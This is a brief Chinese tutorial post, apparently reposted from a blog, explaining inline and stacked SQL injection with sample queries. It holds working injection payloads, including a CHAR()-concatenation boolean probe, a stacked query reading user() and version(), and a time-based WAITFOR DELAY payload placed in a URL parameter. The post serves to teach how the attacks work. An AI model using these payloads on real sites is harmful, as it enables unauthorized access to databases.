内联注入和堆叠注入

时间:2019-10-31 01:17:19   收藏:0   阅读:497

一、内联注入

  select id from (select 1 as id)a;

技术分享图片

   select * from T1,T3 where T1.userid=T3.userid;

   select * from admin,news where admin.uid=news.tid;

技术分享图片

   select * from admin where uid = 1 and (SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))

技术分享图片

 二、堆叠注入

  堆叠恶意sql语句,威胁度极高。

  select * from news;select 1,2,3,4,user(),version();

  payload:id=1;WAITFOR DELAY ‘0:0:5‘--

  http://……/less-2.asp?id=1;WAITFOR DELAY ‘0:0:5‘--

技术分享图片

 技术分享图片

 

原文:https://www.cnblogs.com/yuanshu/p/11765240.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!